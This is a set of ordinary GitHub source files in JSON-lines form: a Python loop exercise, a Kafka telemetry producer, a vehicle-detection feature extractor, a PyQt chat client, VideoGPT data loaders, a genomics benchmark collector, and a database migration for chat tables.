{"seq_id":"74700798271","text":"homemvelho= ' '\nmulheres = 0\nidadeh = 0\nfor ps in range (1,9):\n nome = str(input('Digite seu nome: '))\n idade = int(input('Digite a sua idade: '))\n sexo = str(input('Digite seu sexo: '))\n if sexo == \"homem\" and idade > idadeh:\n homemvelho = nome\n idadeh = idade\n if sexo == \"mulher\" and idade < 20:\n mulheres +=1\n\nprint(\"O homem mais velho é: \", homemvelho)\nprint('A mulheres menores de 20 anos : ', mulheres)","repo_name":"LoremrsSousa/python.02","sub_path":"ExRepetFOR/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"15952556963","text":"import csv\nimport random\nfrom datetime import datetime\nimport pytz\nfrom threading import Timer\nfrom confluent_kafka import Producer\nimport logging\n\n# from snakebite.client import Client\n\n# HADOOP_HOST = \"localhost\"\n# # HADOOP_HOST='namenode'\n# client = Client(HADOOP_HOST, 9000)\n\n# for p in client.mkdir([\"/demo/demo1\", \"/demo2\"], create_parent=True):\n# print(\"p\", p)\n\n\nHOST = \"broker:29092\"\n# HOST = \"localhost:9092\"\nlogging.basicConfig(\n format=\"%(asctime)s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n filename=\"producer.log\",\n filemode=\"w\",\n)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef receipt(err, msg):\n if err is not None:\n print(\"Error: {}\".format(err))\n else:\n message = \"Produced message on topic {} with value of {}\\n\".format(\n msg.topic(), msg.value().decode(\"utf-8\")\n )\n logger.info(message)\n print(message)\n\n\nmachines = [\n {\"machine_id\": 1, \"product_name\": \"peugeot 208\", \"product_category\": \"vehicule\"},\n # {\"machine_id\": 2, \"product_name\": \"clio 4\", \"product_category\": \"vehicule\"},\n]\nperiod = 5\nfields = [\n \"product_name\",\n \"product_category\",\n \"dateHour\",\n \"gpsSpeed\",\n \"gpsSatCount\",\n \"Gear\",\n \"Brake_pedal\",\n \"Accel_pedal\",\n \"Machine_Speed_Mesured\",\n \"AST_Direction\",\n \"Ast_HPMB1_Pressure_bar\",\n \"Ast_HPMA_Pressure_bar\",\n \"Pressure_HighPressureReturn\",\n \"Pressure_HighPressure\",\n \"Oil_Temperature\",\n \"Ast_FrontAxleSpeed_Rpm\",\n \"Pump_Speed\",\n]\n\n\ndef gen_csv():\n Timer(period, gen_csv).start()\n now = datetime.now()\n\n # second = str(now.second)\n minute = str(now.minute)\n hour = str(now.hour)\n\n day = str(now.day)\n month = str(now.month)\n year = str(now.year)\n date_time = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n machine = random.choice(machines)\n\n machine_id = str(machine[\"machine_id\"])\n product_name = machine[\"product_name\"]\n product_category = machine[\"product_category\"]\n print(\"machine_id\", machine_id)\n print(\"product_name\", product_name)\n 
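# echo the selected machine's metadata before assembling the two synthetic telemetry rows\n 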
print(\"product_category\", product_category)\n rows = [\n [\n product_name,\n product_category,\n date_time\n + \":0.\"\n + str(datetime.now().microsecond), # \"2018-01-19 05:37:0.612611\",\n random.uniform(5, 8.62), # 8.62,\n random.randint(50, 94), # 94,\n random.randint(0, 131), # 131,\n random.randint(0, 131), # 131,\n random.randint(0, 1), # 0,\n random.randint(10, 20), # 20,\n random.randint(10, 20), # 20,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(12345, 32826), # 32826,\n random.randint(38, 58), # 58,\n random.randint(12345, 32826), # 32826,\n random.randint(128, 894), # 894,\n ],\n [\n product_name,\n product_category,\n date_time\n + \":0.\"\n + str(datetime.now().microsecond), # \"2018-01-19 05:37:0.612611\",\n random.uniform(5, 8.62), # 8.62,\n random.randint(50, 94), # 94,\n random.randint(0, 131), # 131,\n random.randint(0, 131), # 131,\n random.randint(0, 1), # 0,\n random.randint(10, 20), # 20,\n random.randint(10, 20), # 20,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(0, 1), # 0,\n random.randint(12345, 32826), # 32826,\n random.randint(38, 58), # 58,\n random.randint(12345, 32826), # 32826,\n random.randint(128, 894), # 894,\n ],\n ]\n\n newYorkTz = pytz.timezone(\"Europe/Paris\")\n timeInNewYork = str(datetime.now(newYorkTz))\n\n # name of csv file\n csv_file = \"X467\" + machine_id + \"_\" + timeInNewYork + \".csv\"\n filename = \"./csv_data/\" + csv_file\n\n # writing to csv file\n with open(filename, \"w\") as csvfile:\n # creating a csv writer object\n try:\n csvwriter = csv.writer(csvfile, delimiter=\";\")\n\n # writing the fields\n csvwriter.writerow(fields)\n\n # writing the data rows\n csvwriter.writerows(rows)\n # client.copyFromLocal(csv_file, \"/csv_data/\" + csv_file)\n TOPIC_NAME = \"new_csv_kafka_topic\"\n p = Producer({\"bootstrap.servers\": HOST})\n\n p.produce(TOPIC_NAME, csv_file, callback=receipt)\n p.flush()\n except Exception as e:\n print(\"error\", e)\n # logger.log(e).debug()\n finally:\n # if os.path.exists(filename):\n # os.remove(filename)\n # print(\"file removed\", filename)\n print(\"ok finally\")\n\n\ngen_csv()\n","repo_name":"hoochycoochie/iot_jems","sub_path":"producer/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17760597424","text":"import cv2\nimport time\nimport matplotlib.image as mpimg\nimport numpy as np\nfrom skimage.feature import hog\nimport matplotlib.pyplot as plt\nimport glob\n\nhog_extractor_global = None\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\n\n\n# Define a function to compute binned color features\ndef bin_spatial(img, size=(32, 32)):\n features = cv2.resize(img, size).ravel()\n return features\n\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):\n # Call with two outputs if visualize is True\n if vis:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n transform_sqrt=True, visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else:\n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n transform_sqrt=True, visualise=vis, 
feature_vector=feature_vec)\n return features\n\n\n# Define a function to compute color histogram features\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:, :, 0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:, :, 1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:, :, 2], bins=nbins, range=bins_range)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n\ndef extract_features(imgs, cspace='RGB', spatial_size=(32, 32), hist_bins=32, hist_range=(0, 256), orient=9,\n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n extract_spatial_features=True, extract_hist_features=True, extract_hog_features=True):\n # Create a list to append feature vectors to\n features = []\n\n # hog_extract_manager = None\n\n # Iterate through the list of images\n for file in imgs:\n\n file_features = []\n\n # Read in each one by one\n img = mpimg.imread(file)\n\n img = (img * 255).astype(np.uint8)\n\n # apply color conversion if other than 'RGB'\n if cspace != 'RGB':\n if cspace == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif cspace == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif cspace == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif cspace == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif cspace == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else:\n feature_image = np.copy(img)\n\n if extract_spatial_features:\n # Apply bin_spatial() to get spatial color features\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n file_features.append(spatial_features)\n\n if extract_hist_features:\n # Apply color_hist() also with a color space option now\n hist_features = color_hist(feature_image, nbins=hist_bins, bins_range=hist_range)\n file_features.append(hist_features)\n\n if extract_hog_features:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:, :, channel],\n orient, pix_per_cell, cell_per_block,\n vis=False, feature_vec=True))\n hog_features = np.ravel(hog_features)\n else:\n hog_features = get_hog_features(feature_image[:, :, hog_channel], orient,\n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n\n file_features.append(hog_features)\n\n # Append the new feature vector to the features list\n features.append(np.concatenate(file_features))\n\n # Return list of feature vectors\n return features\n\n\nif __name__ == \"__main__\":\n cars = glob.glob('./data/vehicles/**/*.png')\n notcars = glob.glob('./data/non-vehicles/**/*.png')\n car = mpimg.imread(cars[10])\n notcar = mpimg.imread(notcars[10])\n\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('Car')\n plt.imshow(car)\n\n plt.subplot(1, 2, 2)\n plt.imshow(notcar)\n plt.title('Not Car')\n\n fig.savefig('./output_images/sample_image.png')\n fig.clear()\n\n img = (car * 255).astype(np.uint8)\n\n from skimage.feature import hog\n\n img1 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n hog_feat, hog_image = hog(img1[:, :, 0], orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2),\n visualise=True)\n # Preview\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('RGB')\n plt.imshow(img, 
cmap='gray')\n\n plt.subplot(1, 2, 2)\n plt.imshow(hog_image, cmap='gray')\n plt.title('HoG - YCrCb')\n fig.savefig('./output_images/hog_image1.png', bbox_inches='tight', pad_inches=0)\n fig.clear()\n\n img2 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n hog_feat, hog_image = hog(img2[:, :, 0], orientations=8, pixels_per_cell=(10, 10), cells_per_block=(4, 4),\n visualise=True)\n # Preview\n fig = plt.figure()\n plt.subplot(1, 2, 1)\n plt.title('RGB')\n plt.imshow(img, cmap='gray')\n\n plt.subplot(1, 2, 2)\n plt.imshow(hog_image, cmap='gray')\n plt.title('HoG - YCrCb')\n fig.savefig('./output_images/hog_image2.png', bbox_inches='tight', pad_inches=0)\n fig.clear()\n","repo_name":"43061b4a/CarND-Vehicle-Detection","sub_path":"feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"17425883421","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QGridLayout, QLabel, QPushButton, QLineEdit, QTextEdit\nfrom PyQt5.QtCore import Qt\nimport sys\nimport socket\nimport threading\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n widget = QWidget()\n self.setWindowTitle(\"Un logiciel de tchat\")\n self.setCentralWidget(widget)\n self.__layout = QGridLayout()\n widget.setLayout(self.__layout)\n\n # Socket\n self.__socket = socket.socket()\n\n # Server address input\n self.__Server = QLabel('Serveur')\n self.__SaisieServer = QLineEdit('localhost')\n #self.__LineEditServer.setPlaceholderText('Serveur')\n\n # Port input\n self.__Port = QLabel('Port')\n self.__SaisiePort = QLineEdit('10000')\n #self.__LineEditPort.setPlaceholderText('Port')\n\n # connection button\n self.__btnconnexion = QPushButton()\n self.__btnconnexion.setText('Connexion')\n #self.__btnconnexion.clicked.connect(self.__connect)\n\n\n # chat display\n self.__TchatBox = QTextEdit()\n self.__TchatBox.setReadOnly(True)\n self.__layout.setRowStretch(4, 0)\n\n # message input\n self.__Message = QLabel('Message : ')\n self.__SaisieMessage = QLineEdit('')\n self.__SaisieMessage.setEnabled(False)\n\n # send button\n self.__Envoyer = QPushButton(\"Envoyer\")\n self.__Envoyer.setEnabled(False)\n\n # clear & quit buttons\n self.__Effacer = QPushButton('Effacer')\n self.__Quitter = QPushButton('Quitter')\n #self.__quitbutton.clicked.connect(self.__quitter)\n\n self.__layout.addWidget(self.__Server, 0, 0)\n self.__layout.addWidget(self.__SaisieServer, 0, 1)\n self.__layout.addWidget(self.__Port, 1, 0)\n self.__layout.addWidget(self.__SaisiePort, 1, 1)\n self.__layout.addWidget(self.__btnconnexion, 3, 0, 1, 2)\n self.__layout.addWidget(self.__TchatBox, 4, 0, 1, 2)\n self.__layout.addWidget(self.__Message, 5, 0)\n self.__layout.addWidget(self.__SaisieMessage, 5, 1)\n self.__layout.addWidget(self.__Envoyer, 6, 0, 1, 2)\n self.__layout.addWidget(self.__Effacer, 8, 0, 1, 2)\n self.__layout.addWidget(self.__Quitter, 9, 0, 1, 2)\n\n self.__btnconnexion.clicked.connect(self.__connexion)\n self.__Envoyer.clicked.connect(self.__envoyer)\n self.__Effacer.clicked.connect(self.__effacer)\n self.__Quitter.clicked.connect(self.__quitter)\n #self.__quitter.clicked.connect(self.__actionquitter)\n\n self.__serverSocket = socket.socket()\n self.__force_stop = False\n self.__serverStarted = False\n self.__clients = []\n\n def __connexion(self):\n if self.__btnconnexion.text() == \"Deconnexion\":\n self.__btnconnexion.setText('Connexion')\n self.__Envoyer.setEnabled(False)\n 
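# keep the send button and the message box disabled while the client is offline\n 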
self.__SaisieMessage.setEnabled(False)\n self.__socket.close()\n elif self.__btnconnexion.text() == \"Connexion\":\n self.__btnconnexion.setText('Deconnexion')\n self.__Envoyer.setEnabled(True)\n self.__SaisieMessage.setEnabled(True)\n PORT = self.__SaisiePort.text()\n PORT = int(PORT)\n SERVEUR = self.__SaisieServer.text()\n SERVEUR = str(SERVEUR)\n try:\n self.__socket.connect((SERVEUR, PORT))\n except:\n print(\"La connexion n'a pas pu être établie..\")\n\n def __envoyer(self):\n self.__thread = threading.Thread(target=self.__reception, args=[self.__socket])\n self.__thread.start()\n x = self.__SaisieMessage.text()\n self.__TchatBox.setAlignment(Qt.AlignRight)\n self.__TchatBox.append(x)\n self.__socket.send(x.encode())\n self.__SaisieMessage.clear()\n\n def __effacer(self):\n self.__TchatBox.setPlainText(\"\")\n\n def __quitter(self):\n if self.__btnconnexion.text() == \"Connexion\":\n self.__TchatBox.append('deco-serveur')\n self.__socket.close()\n else:\n self.__socket.close()\n\n def __reception(self, conn):\n\n data = \"\"\n while data != \"deco-server\":\n data = str(conn.recv(1024).decode())\n self.__TchatBox.setAlignment(Qt.AlignLeft)\n self.__TchatBox.append(data)\n\n","repo_name":"Jaaftl/R3.09","sub_path":"Examen_R309.py","file_name":"Examen_R309.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29435945176","text":"import os\nimport os.path as osp\nimport math\nimport random\nimport pickle\nimport warnings\n\nimport glob\nimport h5py\nimport numpy as np\n\nimport torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport torch.distributed as dist\nfrom torchvision.datasets.video_utils import VideoClips\nimport pytorch_lightning as pl\n\n\nclass VideoDataset(data.Dataset):\n \"\"\" Generic dataset for videos files stored in folders\n Returns BCTHW videos in the range [-0.5, 0.5] \"\"\"\n exts = ['avi', 'mp4', 'webm']\n\n def __init__(self, data_folder, sequence_length, train=True, resolution=64):\n \"\"\"\n Args:\n data_folder: path to the folder with videos. 
The folder\n should contain a 'train' and a 'test' directory,\n each with corresponding videos stored\n sequence_length: length of extracted video sequences\n \"\"\"\n super().__init__()\n self.train = train\n self.sequence_length = sequence_length\n self.resolution = resolution\n\n folder = osp.join(data_folder, 'train' if train else 'test')\n files = sum([glob.glob(osp.join(folder, '**', f'*.{ext}'), recursive=True)\n for ext in self.exts], [])\n\n # hacky way to compute # of classes (count # of unique parent directories)\n self.classes = list(set([get_parent_dir(f) for f in files]))\n self.classes.sort()\n self.class_to_label = {c: i for i, c in enumerate(self.classes)}\n\n warnings.filterwarnings('ignore')\n cache_file = osp.join(folder, f\"metadata_{sequence_length}.pkl\")\n if not osp.exists(cache_file):\n clips = VideoClips(files, sequence_length, num_workers=32)\n pickle.dump(clips.metadata, open(cache_file, 'wb'))\n else:\n metadata = pickle.load(open(cache_file, 'rb'))\n clips = VideoClips(files, sequence_length,\n _precomputed_metadata=metadata)\n self._clips = clips\n\n @property\n def n_classes(self):\n return len(self.classes)\n\n def __len__(self):\n return self._clips.num_clips()\n\n def __getitem__(self, idx):\n resolution = self.resolution\n video, _, _, idx = self._clips.get_clip(idx)\n\n class_name = get_parent_dir(self._clips.video_paths[idx])\n label = self.class_to_label[class_name]\n return dict(video=preprocess(video, resolution), label=label)\n\n\ndef get_parent_dir(path):\n return osp.basename(osp.dirname(path))\n\n\ndef preprocess(video, resolution, sequence_length=None):\n # video: THWC, {0, ..., 255}\n video = video.permute(0, 3, 1, 2).float() / 255. # TCHW\n t, c, h, w = video.shape\n\n # temporal crop\n if sequence_length is not None:\n assert sequence_length <= t\n video = video[:sequence_length]\n\n # scale shorter side to resolution\n scale = resolution / min(h, w)\n if h < w:\n target_size = (resolution, math.ceil(w * scale))\n else:\n target_size = (math.ceil(h * scale), resolution)\n video = F.interpolate(video, size=target_size, mode='bilinear',\n align_corners=False)\n\n # center crop\n t, c, h, w = video.shape\n w_start = (w - resolution) // 2\n h_start = (h - resolution) // 2\n video = video[:, :, h_start:h_start + resolution, w_start:w_start + resolution]\n video = video.permute(1, 0, 2, 3).contiguous() # CTHW\n\n video -= 0.5\n\n return video\n\n\nclass HDF5Dataset(data.Dataset):\n \"\"\" Generic dataset for data stored in h5py as uint8 numpy arrays.\n Reads videos in {0, ..., 255} and returns in range [-0.5, 0.5] \"\"\"\n def __init__(self, data_file, sequence_length, train=True, resolution=64):\n \"\"\"\n Args:\n data_file: path to the pickled data file with the\n following format:\n {\n 'train_data': [B, H, W, 3] np.uint8,\n 'train_idx': [B], np.int64 (start indexes for each video)\n 'test_data': [B', H, W, 3] np.uint8,\n 'test_idx': [B'], np.int64\n }\n sequence_length: length of extracted video sequences\n \"\"\"\n super().__init__()\n self.train = train\n self.sequence_length = sequence_length\n self.resolution = resolution\n\n # read in data\n self.data_file = data_file\n self.data = h5py.File(data_file, 'r')\n self.prefix = 'train' if train else 'test'\n self._images = self.data[f'{self.prefix}_data']\n self._idx = self.data[f'{self.prefix}_idx']\n self.size = len(self._idx)\n\n @property\n def n_classes(self):\n raise Exception('class conditioning not support for HDF5Dataset')\n\n def __getstate__(self):\n state = self.__dict__\n 
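# null out the open h5py handles (they cannot be pickled); __setstate__ reopens them\n 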
state['data'] = None\n state['_images'] = None\n state['_idx'] = None\n return state\n\n def __setstate__(self, state):\n self.__dict__ = state\n self.data = h5py.File(self.data_file, 'r')\n self._images = self.data[f'{self.prefix}_data']\n self._idx = self.data[f'{self.prefix}_idx']\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx):\n start = self._idx[idx]\n end = self._idx[idx + 1] if idx < len(self._idx) - 1 else len(self._images)\n assert end - start >= self.sequence_length\n\n # np.random.randint's high bound is exclusive, so add 1 to allow the last valid\n # start offset and avoid randint(0, 0) when the clip is exactly sequence_length frames\n start = start + np.random.randint(low=0, high=end - start - self.sequence_length + 1)\n assert start < start + self.sequence_length <= end\n video = torch.tensor(self._images[start:start + self.sequence_length])\n return dict(video=preprocess(video, self.resolution))\n\n\nclass VideoData(pl.LightningDataModule):\n\n def __init__(self, args):\n super().__init__()\n self.args = args\n\n @property\n def n_classes(self):\n dataset = self._dataset(True)\n return dataset.n_classes\n\n\n def _dataset(self, train):\n Dataset = VideoDataset if osp.isdir(self.args.data_path) else HDF5Dataset\n dataset = Dataset(self.args.data_path, self.args.sequence_length,\n train=train, resolution=self.args.resolution)\n return dataset\n\n\n def _dataloader(self, train):\n dataset = self._dataset(train)\n if dist.is_initialized():\n sampler = data.distributed.DistributedSampler(\n dataset, num_replicas=dist.get_world_size(), rank=dist.get_rank()\n )\n else:\n sampler = None\n dataloader = data.DataLoader(\n dataset,\n batch_size=self.args.batch_size,\n num_workers=self.args.num_workers,\n pin_memory=True,\n sampler=sampler,\n shuffle=sampler is None\n )\n return dataloader\n\n def train_dataloader(self):\n return self._dataloader(True)\n\n def val_dataloader(self):\n return self._dataloader(False)\n\n def test_dataloader(self):\n return self.val_dataloader()\n","repo_name":"wilson1yan/VideoGPT","sub_path":"videogpt/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"60"}
{"seq_id":"22089514829","text":"## Quick code to collect all benchmark information\n\nimport glob\nimport os\nimport pandas as pd\nimport re\nimport argparse\n\n\ndef extract_information(sample, path=''):\n \"\"\"\n Function to extract information for a given sample\n :params path: parent directory from which all the remaining directories can be found\n :params sample: name of the sample so that we can extract info regarding all those samples\n :return: The output is a dictionary for each rule with the associated **minutes** that each rule required to execute\n \"\"\"\n \n benchmark_dict = {}\n\n list_files_fastqc = os.listdir(path+'fastqc_out/')\n list_benchmark = [i for i in list_files_fastqc if re.search('.benchmark$', i)]\n\n value = 0\n for i in list_benchmark:\n \n df = pd.read_csv(path+'fastqc_out/'+i, delimiter=' ')\n value += df.s.values[0]\n\n value_seqtk = 0\n for i in os.listdir(path+'OUTPUT3/'+sample+'/seqtk/'):\n\n df = pd.read_csv(path+'OUTPUT3/'+sample+'/seqtk/'+i, delimiter=' ')\n value_seqtk += df.s.values[0]\n\n ## Fastqc\n benchmark_dict['fastqc'] = round(value/60, 2)\n\n ## Seqtk\n benchmark_dict['Seqtk'] = round(value_seqtk/60, 2) \n\n ## Bwa\n benchmark_dict['Bwa'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## SamBlaster\n benchmark_dict['SamBlaster'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_samblaster.benchmark', delimiter=' ').s.values[0]/60, 
2)\n\n ## SamSort\n benchmark_dict['SamSort'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_sort_nodup.sam.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## SamIndex\n benchmark_dict['SamIndex'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/bwa/'+sample+'_sort_nodup.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## BaseRecalibrator\n benchmark_dict['BaseRecalibrator'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_bsr/'+sample+'_sort_nodup.recaldat.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## ApplyBQSR\n benchmark_dict['ApplyBQSR'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_bsr/'+sample+'_sort_nodup.bqsr.benchmark', delimiter=' ').s.values[0]/60, 2)\n\n ## HaplotypeCaller\n benchmark_dict['HaploType'] = round(pd.read_csv(path+'OUTPUT3/'+sample+'/gatk_gvcf/'+sample+'_sort_nodup.g.vcf.benchmark', delimiter=' ').s.values[0]/60, 2)\n \n return benchmark_dict\n\n\ndef extract_info_list(id_, sample, path):\n\n l = []\n deli = '\\t'\n\n list_files_fastqc = os.listdir(path+'fastqc/')\n list_benchmark = [i for i in list_files_fastqc if re.search('.benchmark$', i)]\n\n value = 0\n for i in list_benchmark:\n\n df = pd.read_csv(path+'fastqc/'+i, delimiter=deli)\n value += df.s.values[0]\n\n # ID\n l.append(id_)\n\n ## Fastqc\n l.append(round(value/60, 2))\n\n ## Bwa\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## SamBlaster\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'_samblaster.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## SamSort\n try:\n l.append(round(pd.read_csv(path+'bwa/'+sample+'_sort_nodup.sam.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## BaseRecalibrator\n try:\n l.append(round(pd.read_csv(path+'gatk_bsr/'+sample+'_sort_nodup.recaldat.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## ApplyBQSR\n try:\n l.append(round(pd.read_csv(path+'gatk_bsr/'+sample+'_sort_nodup.bqsr.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## Haplotype\n try:\n l.append(round(pd.read_csv(path+'gatk_gvcf/tmp_'+sample+'_sort_nodup.g.vcf.benchmark', delimiter=deli).s.values[0]/60, 2))\n except FileNotFoundError as e:\n l.append(0)\n\n ## File size\n size = round(os.path.getsize(path + sample + '_R1.fastq.gz')*1e-9, 2)\n size += round(os.path.getsize(path + sample + '_R1.fastq.gz')*1e-9, 2)\n l.append(size)\n\n return l\n\n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser(description='Collect Benchmark Information')\n parser.add_argument(\"--path\", type=str)\n\n args = parser.parse_args()\n path = args.path\n\n centers = ['1a77728b-011a-4407-b60e-ec90b6430b99', 'ed615b8d-fa86-48bb-b0f8-c841e1aeb0eb', 'd7c41726-13a8-4abd-b185-68198fec12f4', \n 'fb203f69-94b9-42aa-9f34-c9ee8219a22e', \n 'eaabd6f1-1b34-4196-882c-198465045d71']\n\n\n data = [['id', 'fastqc', 'bwa', 'samblaster', 'samsort', 'base', 'apply', 'haplo', 'size (GB)', 'total time (min)']]\n\n for center in centers:\n for study in os.listdir(path + '/' + center + '/'):\n for sample in os.listdir(path + '/' + center + '/' + study + '/'):\n path_parent = path + '/' + center + '/' + study + '/' + sample + '/'\n try:\n samples = [os.path.basename(x) for x in glob.glob(path_parent + '/*.gz')][0]\n samples = samples[:-12]\n except IndexError as e:\n print('Cannot find .gz files for 
this sample')\n continue\n\n tmp = extract_info_list(id_=center + '||' + study + '||' + sample, sample = samples, path = path_parent)\n tmp.append(sum(tmp[1:8]))\n data.append(tmp)\n\n\n print('FINISHED')\n print('==================================')\n print('==================================')\n print('==================================')\n df = pd.DataFrame(data[1:], columns=data[0])\n bins = [0, 5, 10, 15, 20, 25]\n bins1 = [i for i in range(25)]\n df['size_bin'] = pd.cut(df['size (GB)'], bins)\n df['size_bin_small'] = pd.cut(df['size (GB)'], bins1) \n \n x = df.groupby(['size_bin'])['total time (min)'].mean()\n plot = x.plot(kind='bar', xlabel='Size Bucket', ylabel='Processing Time (min)', title='Computational Processing \\n Benchmark')\n fig = plot.get_figure()\n fig.savefig(\"output.png\", bbox_inches='tight')\n # df.to_csv('res.csv')\n df1 = df[(df.size_bin_small == pd.Interval(5, 6, closed='right')) | \n (df.size_bin_small == pd.Interval(10, 11, closed='right')) | \n (df.size_bin_small == pd.Interval(22, 23, closed='right'))]\n print(df1.head())\n x = df1.groupby(['size_bin_small'])[['fastqc', 'bwa', 'samsort', 'base', 'apply', 'haplo']].mean().dropna()\n print(x)\n plot = x.T.plot(kind='bar')\n fig = plot.get_figure()\n fig.savefig(\"output1.png\", bbox_inches='tight')\n\n\n \n\n","repo_name":"JuanMataNaranjo/CINECA_repo","sub_path":"benchmark/benchmark_collector.py","file_name":"benchmark_collector.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18543476290","text":"\"\"\"empty message\n\nRevision ID: 631083893e51\nRevises: c58701958f34\nCreate Date: 2022-08-12 10:10:57.380721\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '631083893e51'\ndown_revision = 'c58701958f34'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('conversations',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('creator_id', sa.Integer(), nullable=False),\n sa.Column('participant_id', sa.Integer(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['creator_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['participant_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('conversation_id', sa.Integer(), nullable=False),\n sa.Column('sender_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversations.id'], ),\n sa.ForeignKeyConstraint(['sender_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
